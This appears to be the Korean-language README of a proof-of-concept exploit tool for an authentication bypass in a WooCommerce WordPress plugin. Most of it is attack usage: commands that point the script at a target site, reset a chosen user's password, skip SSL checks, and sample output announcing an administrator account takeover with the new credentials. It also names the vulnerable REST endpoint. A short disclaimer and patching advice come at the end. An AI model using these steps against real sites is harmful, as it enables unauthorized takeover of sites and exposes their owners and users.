
PoC exploit for CVE-2026-10580 - Authentication Bypass in Hippoo Mobile App for WooCommerce <= 1.9.4 leading to Admin Account Takeover
이 도구는 CVE-2026-10580에 대한 개념 증명 익스플로잇입니다. 이 취약점은 Hippoo Mobile App for WooCommerce WordPress 플러그인(버전 <= 1.9.4)에 영향을 미치는 인증 우회 취약점입니다. 이 취약점은 인증되지 않은 공격자가 관리자를 포함한 모든 사용자의 비밀번호를 재설정하여 사이트 전체를 장악할 수 있게 합니다.
⚠️ 중요: 이 도구는 공인된 보안 테스트 및 교육 목적으로만 사용됩니다. 소유하지 않거나 명시적 허가 없이 시스템에 무단 사용하는 것은 불법입니다.
requests 라이브러리의존성 설치:
pip install requests
python3 exploit.py -t https://target-site.com -p NewPassword123!
기본 관리자 ID(1)와 SSL 검증 사용하여 익스플로잇 실행:
python3 exploit.py -t https://example.com -p PwnedCVE2026!!
특정 사용자 ID를 대상으로 SSL 검증 비활성화:
python3 exploit.py -t https://example.com -p NewPass123 -i 2 -k
배너 없이 실행:
python3 exploit.py -t https://example.com -p NewPass123 --no-banner
[+] 3명의 사용자를 찾았습니다
- 사용자 ID: 1 | 사용자명: admin | 역할: administrator
- 사용자 ID: 2 | 사용자명: editor_user | 역할: editor
- 사용자 ID: 3 | 사용자명: subscriber1 | 역할: subscriber
╔══════════════════════════════════════════════════════════════╗
║ 관리자 계정 탈취 성공 ║
╚══════════════════════════════════════════════════════════════╝
대상: https://example.com
로그인: https://example.com/wp-admin
사용자명: admin
비밀번호: PwnedCVE2026!!
Hippoo 플러그인을 사용 중이라면 즉시 패치된 버전(>1.9.4)으로 업데이트하세요. 추가로:
/wp-json/wc-hippoo/v1/ext/wp/v2/users에 대한 예상치 못한 API 요청을 로그에서 모니터링하세요이 프로젝트는 MIT 라이선스에 따라 라이선스가 부여됩니다. 자세한 내용은 LICENSE 파일을 참조하세요.
0xgh057r3c0n
저자는 이 도구의 오용에 대해 책임지지 않습니다. 책임감 있게 사용하고, 소유하거나 명시적 테스트 허가를 받은 시스템에서만 사용하세요.
| 인자 | 설명 |
|---|
-t, --target | 대상 WordPress 사이트 URL (예: https://example.com) |
-p, --password | 관리자 계정에 설정할 새 비밀번호 |
-i, --id | 탈취할 사용자 ID (기본값: 1) |
-k, --insecure | SSL 인증서 검증 건너뛰기 |
--no-banner | ASCII 배너 숨기기 |